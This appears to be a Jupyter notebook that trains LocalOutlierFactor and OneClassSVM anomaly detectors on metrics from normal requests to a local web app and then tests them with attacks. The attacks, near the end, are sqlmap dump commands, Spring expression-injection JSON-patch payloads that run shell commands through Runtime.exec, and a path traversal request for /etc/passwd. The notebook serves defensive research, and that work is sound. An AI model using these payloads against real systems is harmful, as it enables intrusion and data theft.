Generierung der Testdaten mit legitimen Nutzeranfragen
import requests
from pandas.io.json import json_normalize
import matplotlib
import random
import string
from IPython.core.display import HTML
import pandas as pd
import matplotlib.pyplot as plt
import json
requests.get("http://localhost:5000/start-learning")
requests.get("http://localhost:5000/purge-data")
i=0
while i<1000:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(5, 49)))
requests.post('http://localhost:8080/design', data = {'name': random_name, 'components': random.choice(['INTELI82', 'INTELI85', '4GB', '16GB', '1TB', '512GB', '256GB'])})
i +=1
Generierte Daten werden vom Detection System heruntergeladen
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
df = json_normalize(data)
df = df.loc[df['function'] == '/design;POST']
df.describe()
df.loc[:, "computer- Total Exec Time"].describe()
df.boxplot(column=['convert- Total Exec Time'], figsize=(5,25))
df.hist(column=['convert- Total Exec Time'])
df.filter(regex='^(.*Object.*)').boxplot(figsize=(40,25))
#df.filter(regex='^(.*Counter.*)').hist(figsize=(40,25));
df.filter(regex='^(.*Counter.*)').loc[:, df.std() > 0].shape[1]
python2 sqlmap.py --wizard -u http://localhost:8080/design --dump
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
df = json_normalize(data)
df = df.loc[df['function'] == '/design;POST']
df.filter(regex='^(.*Object.*)').boxplot(figsize=(40,25));
df.filter(regex='^(.*Counter.*)').loc[:, df.std() > 0].shape[1]
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import LocalOutlierFactor
from sklearn.svm import OneClassSVM
import collections
requests.get("http://localhost:5000/start-learning")
requests.get("http://localhost:5000/purge-data")
i=0
while i<1000:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(5, 49)))
requests.post('http://localhost:8080/design', data = {'name': random_name, 'components': random.choice(['INTELI82', 'INTELI85', '4GB', '16GB', '1TB', '512GB', '256GB'])})
i +=1
#Get Data
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
df = json_normalize(data)
df = df.fillna(value=0)
df = df[df['function']=='/design;POST']
df = df.filter(regex='^((?!Time).)*$')
#Extract columns (mustn't change because tranform does notw work; this is an ultimate anomaly sign!)
columns = df.columns
columns = columns.drop('function')
columns = columns.drop('request')
# Separating out the features
data = df.loc[:, columns].values
# Scaling Data
scaler = StandardScaler()
data = scaler.fit_transform(data)
##train model##
#LocalOutlierFactor
lof = LocalOutlierFactor(algorithm='auto', contamination='auto', novelty=True)
lof.fit(data)
#One Class SVM
ocs = OneClassSVM(kernel="rbf", gamma='scale')
ocs.fit(data)
Testdaten erstellen und Modell Testen
requests.get("http://localhost:5000/purge-data")
i=0
while i<99:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(5, 49)))
requests.post('http://localhost:8080/design', data = {'name': random_name, 'components': random.choice(['INTELI82', 'INTELI85', '4GB', '16GB', '1TB', '512GB', '256GB'])})
i +=1
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
df = json_normalize(data)
df = df[df['function']=='/design;POST']
df = df.filter(regex='^((?!Time).)*$')
df = df.merge(pd.DataFrame(columns=columns), how='left')
df = df.fillna(value=0)
data = df.loc[:, columns].values
data = scaler.transform(data)
pred_lof = lof.predict(data)
pred_ocs = ocs.predict(data)
display("Local Outliner Factor:")
display("Outliers: " + str(collections.Counter(pred_lof)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_lof)[1]))
display("One Class SVM:")
display("Outliers: " + str(collections.Counter(pred_ocs)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_ocs)[1]))
python2 sqlmap.py --wizard -u http://localhost:8080/design --dump
res = requests.get("http://localhost:5000/getdata-byfunction")
data = res.json()
df = json_normalize(data)
df = df[df['function']=='/design;POST']
df = df.filter(regex='^((?!Time).)*$')
df = df.merge(pd.DataFrame(columns=columns), how='left')
df = df.fillna(value=0)
data = df.loc[:, columns].values
data = scaler.transform(data)
pred_lof = lof.predict(data)
pred_ocs = ocs.predict(data)
display("Local Outliner Factor:")
display("Outliers: " + str(collections.Counter(pred_lof)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_lof)[1]))
display("One Class SVM:")
display("Outliers: " + str(collections.Counter(pred_ocs)[-1]))
display("Non Outliers: " + str(collections.Counter(pred_ocs)[1]))
requests.get("http://localhost:5000/stop-learning")
i=0
while i<100:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(5, 49)))
requests.post('http://localhost:8080/design', data = {'name': random_name, 'components': random.choice(['INTELI82', 'INTELI85', '4GB', '16GB', '1TB', '512GB', '256GB'])})
i +=1
req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
req = requests.get("http://localhost:5000/get-new-anomalies-data")
data = req.json()
requests.get("http://localhost:5000/purge-predict")
lof_decision_data = data['lof_decision_data']
df = pd.DataFrame(lof_decision_data)
plt.figure(figsize=(12, 6))
plt.hist(df, bins=5);
Modell trainieren
requests.get("http://localhost:5000/purge-data")
requests.get("http://localhost:5000/start-learning")
headers = {'content-type': 'application/json'}
i=0
while i<2000:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(0, 20)))
random_attribute = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(0, 20)))
requests.post('http://localhost:8080/entity', json = {'name': random_name, 'attribute': random_attribute}, headers=headers)
i +=1
Modell testen
requests.get("http://localhost:5000/stop-learning")
#requests.get("http://localhost:5000/purge-predict")
headers = {'content-type': 'application/json'}
i=0
while i<97:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(0, 20)))
random_attribute = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(0, 20)))
requests.post('http://localhost:8080/entity', json = {'name': random_name, 'attribute': random_attribute}, headers=headers)
i +=1
req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
requests.get("http://localhost:5000/purge-predict")
headers = {'content-type': 'application/json-patch+json'}
requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(java.lang.Thread).sleep(1000).x"',
'value' : 'pwned'}]), headers=headers)
requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("ifconfig").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x',
'value' : 'pwned'}]), headers=headers)
requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("df -h").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x',
'value' : 'pwned'}]), headers=headers)
req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
headers = {'content-type': 'application/json-patch+json'}
req = requests.patch('http://localhost:8080/entity/1/', data = json.dumps([{ 'op' : 'replace',
'path' : 'T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("df -h").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x',
'value' : 'pwned'}]), headers=headers)
HTML(req.text)
requests.get("http://localhost:5000/purge-predict")
req = requests.get("http://localhost:8080/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd")
HTML(req.text)
req = requests.get("http://localhost:5000/get-new-anomalies")
HTML(req.text)
requests.get("http://localhost:5000/start-learning")
requests.get("http://localhost:5000/purge-data")
i=0
while i<1000:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(5, 49)))
requests.post('http://localhost:8080/design', data = {'name': random_name, 'components': random.choice(['INTELI82', 'INTELI85', '4GB', '16GB', '1TB', '512GB', '256GB'])})
i +=1
requests.get("http://localhost:5000/stop-learning")
outliers = list()
i2 = 0
while i2<100:
i=0
while i<100:
random_name = ''.join(random.choices(string.ascii_lowercase +string.ascii_uppercase + string.digits, k=random.randint(5, 49)))
requests.post('http://localhost:8080/design', data = {'name': random_name, 'components': random.choice(['INTELI82', 'INTELI85', '4GB', '16GB', '1TB', '512GB', '256GB'])})
i +=1
req = requests.get("http://localhost:5000/get-new-anomalies")
outliers.append(int(req.text.split('Outliers: ')[1].split('<')[0]))
requests.get("http://localhost:5000/purge-predict")
i2+=1
df = pd.DataFrame(outliers)
display(df.min())
display(df.max())
df.mean()
df.describe()